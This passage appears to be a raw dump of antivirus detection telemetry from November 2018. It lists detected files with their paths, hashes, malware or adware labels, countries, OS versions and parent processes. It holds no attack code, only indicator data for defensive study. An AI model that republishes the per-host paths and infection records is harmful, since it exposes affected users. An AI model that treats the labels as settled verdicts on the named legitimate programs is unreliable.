  Row(detection=Row(filename='tmp0023ab56', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ab56', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:04:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092931-7eefb598', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-092931-7EEFB598', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:29:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135949-d391ceaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135949-D391CEAF', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dfserv.exe', filepath='C:\\Program Files (x86)\\Faronics\\Deep Freeze\\Install C-0\\DFServ.exe', filesize=2112000, name='TR/Crypt.XPACK.Gen.#M300.#R4032'), hash='dd69199040d742d157694ea777536d9dc3396365fb06cdac97c76312da89a83f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:01:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295dfb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295dfb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:12:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151647-3616be87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-151647-3616BE87', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:17:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsj2A76.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T11:13:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsb3CBA.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T19:11:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:41:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F741F5311855FC6ED77CE20B8485176C0CC2ADA909BC68997E8A2E4BD5CDAE43', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:34Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:30:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T01:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T03:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155836-e42db1d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155836-E42DB1D5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T08:53:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T13:15:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T09:30:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132745-654ccecd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35c26308\\AVSCAN-20181102-132144-35D13AB6\\AVSCAN-20181102-132745-654CCECD', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='187cc279f5886f476b8c0a00076a9198385e47a5d7afab22376ddc9ca8965e27', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T03:44:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fonts.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\jre\\lib\\fonts\\fonts.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vctrainerplus9.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\VCTrainerPlus9\\VCTrainerPlus9.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='699699662e1d78321421e9786bdbea1d35e4111f38042178c51b1e378c65d7f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\699699662E1D78321421E9786BDBEA1D35E4111F38042178C51B1E378C65D7F7', filesize=320000, name='TR/Spy.Zbot.3184648.#M1.#R1'), hash='699699662e1d78321421e9786bdbea1d35e4111f38042178c51b1e378c65d7f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='32维修分公司绩效管理办法.doc', filepath='C:\\Users\\X\\Desktop\\维修分公司管理制度\\32维修分公司绩效管理办法.doc', filesize=128000, name='HEUR/Macro.Word2000.#M1.#R1'), hash='68e0ce5418ba9591e22ef436bb65eb6ed36e57092bc6211afaf10029c378fb36', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\阳光微讯\\OCS.exe', parentsize=2393600, timestamp='2018-11-02T07:53:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T19:32:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155958-ed003823', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155958-ED003823', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mfhhxdn.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\mfhhxdn.exe', filesize=1856000, name='HEUR/AGEN.1015900.#M1.#R1'), hash='4211746b020025be2362634cf7b6c5fe84b1386938edb7df4890edb2c8e51d91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213603-d0ae4508', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d1cd88c\\AVSCAN-20181102-213539-CD8E6C0C\\AVSCAN-20181102-213603-D0AE4508', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6ee1398b5a9c66ea69b7675bd5fdbaa41e7c2bf073aff1cb6ed856fbcd421f1d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:36:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='18ece932dc5ab9b84c12acae0b09bb3e431b8b82e92e0216d395101d51957f56', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:42:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-13-32-57.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T09:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='misc.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\MISC\\MISC.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skins.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\SKINS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3EBF898E-6BAB-4161-B420-37443DC0569C}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='2a209bc68a3f64655ff3d23d2e4f09e79584b31d6a5ec8bbe9ba88872f6711e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151204-2deefdc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-151028-2501E207\\AVSCAN-20181102-151204-2DEEFDC9', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183635-aaa2fc8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-183635-AAA2FC8E', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:57Z'), dt=datetime.date(2018, 11, 2)),
